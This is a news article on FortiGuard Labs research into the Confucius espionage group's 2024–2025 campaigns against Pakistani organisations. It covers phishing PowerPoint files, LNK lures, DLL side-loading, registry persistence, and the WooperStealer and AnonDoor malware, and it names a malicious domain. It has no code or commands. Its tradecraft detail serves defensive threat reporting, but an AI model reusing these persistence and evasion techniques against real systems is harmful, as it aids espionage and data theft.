The Confucius hacking group, a long-running cyber-espionage operation with suspected state-sponsored ties, has significantly evolved its attack methodologies over the past year, transitioning from document stealers like WooperStealer to sophisticated Python-based backdoors including AnonDoor malware.
The December 2024 campaign demonstrated Confucius’ refined social engineering tactics, utilizing phishing emails with weaponized PowerPoint presentations (Document.ppsx) that displayed “Corrupted Page” messages to victims.
The malicious document contained embedded OLE objects that triggered VBScript execution from remote infrastructure at greenxeonsr.info, initiating a complex infection chain.
Recent analysis by FortiGuard Labs reveals how this South Asian threat actor has weaponized Office documents and malicious LNK files to compromise Windows systems across the region, particularly targeting Pakistan-based organizations.
The attack methodology involves DLL side-loading techniques where the malware copies legitimate Windows executables like fixmapi.exe to user directories, renaming them as Swom.exe for persistence.
The group establishes registry-based persistence under HKCUSOFTWAREMicrosoftWindows NTCurrentVersionWindowsload, enabling automatic execution during system startup.
Evolution to LNK-Based Attacks
By March 2025, Confucius had pivoted to malicious LNK files disguised as legitimate documents like “Invoice_Jan25.pdf.lnk.”
These files execute PowerShell commands that download malicious DLLs and decoy PDF documents from remote servers, maintaining the illusion of legitimate file access while establishing backdoor access.
The downloaded Mapistub.dll creates additional persistence mechanisms and prepares Base64-encoded remote host addresses for payload delivery.
Analysis revealed the final payload remained WooperStealer, configured to exfiltrate extensive file types including documents, images, archives, and email files with extensions ranging from .txt and .pdf to .pst and .eml formats.
The most significant evolution occurred in August 2025 with the introduction of AnonDoor, a sophisticated Python-based backdoor that represents a marked departure from previous .NET-based tools.
The new malware establishes execution environments by downloading and configuring Python through the Scoop package manager, creating hidden .pyc files in user directories.
AnonDoor implements advanced reconnaissance capabilities, fingerprinting victim systems through multiple techniques including WMIC hardware UUID extraction, public IP geolocation via services like api.ipify.org and ip-api.com, and comprehensive disk space enumeration across all drive letters.
Command and Control Operations
The backdoor supports extensive command execution capabilities including screenshot capture, file listing and download, directory traversal, and credential harvesting from browsers like Firefox and Edge.
AnonDoor communicates with command-and-control infrastructure through structured data packets using specific delimiters ($!!$ and #$$) and maintains operational security through 6-minute execution intervals to reduce detection likelihood.
Organizations utilizing FortiGate, FortiMail, FortiClient, and FortiEDR solutions receive automatic protection against these evolving attack vectors.
The malware’s modular architecture allows dynamic loading of additional Python modules from remote servers, enabling operators to expand functionality based on specific intelligence requirements.
Geographic targeting remains focused on South Asian regions, particularly Pakistan, consistent with Confucius’ historical operational patterns.
FortiGuard Labs has implemented comprehensive detection capabilities for this threat campaign, with FortiGuard Antivirus identifying various components including LNK/Agent variants, MSOffice/Agent samples, and Python/Agent classifications.
The Confucius group’s tactical evolution demonstrates the persistent adaptation of state-aligned threat actors, emphasizing the critical importance of multi-layered security approaches and continuous threat intelligence monitoring in defending against sophisticated espionage operations targeting regional government and defense organizations.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.
